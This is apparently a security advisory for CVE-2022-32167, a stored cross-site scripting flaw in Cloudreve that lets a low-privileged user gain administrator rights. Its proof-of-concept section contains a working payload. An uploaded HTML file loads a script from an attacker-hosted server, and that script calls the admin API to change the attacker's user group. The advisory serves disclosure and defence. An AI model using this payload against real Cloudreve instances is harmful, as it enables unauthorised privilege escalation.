icon

We found results for “

CVE-2022-32167

Date: September 20, 2022

Overview

Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS), via the file upload functionality. A low privileged user will be able to share a file with an admin user, which could lead to privilege escalation.

Details

Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS), when attacker upload the malicious HTML file consisting of malicious JavaScript code it’s been stored and when an admin user will preview the file it will execute the malicious code which will then run with admin privileges.

PoC Details

Access the application and create a low privileged user account from an admin user. Now, from the newly created user, upload the malicious HTML file consisting of malicious JavaScript code, as shown in the "POC Code". Create a preview share link and share it with the admin user. Once an admin user accesses the preview link, XSS will trigger and the low privileged user will then have an Administrator role.

PoC Code

XSS Payload Inside safe.html:

<script src=http://0.0.0.0:2222/lpeexploit.js></script>


JS Code Inside lpeexploit.js:

fetch("http://localhost:5212/api/v3/admin/user/2")
.then(response => response.text())
.then(data => {
var post = JSON.parse(data);
delete post.code;
delete post.msg;
post.user = post.data;
delete post.data;
var post2 = post.user;
post2['GroupID'] = 1;
var post_data = JSON.stringify(post);
fetch("http://localhost:5212/api/v3/admin/user",
{
headers: {
'Accept': 'application/json, text/plain, */*',
'Content-Type': 'application/json',
},
method: "POST",
body: post_data
});

});

Affected Environments

3.0.0-beta1--3.5.3

Prevention

No fix.

Language: Go

Good to know:

icon
icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None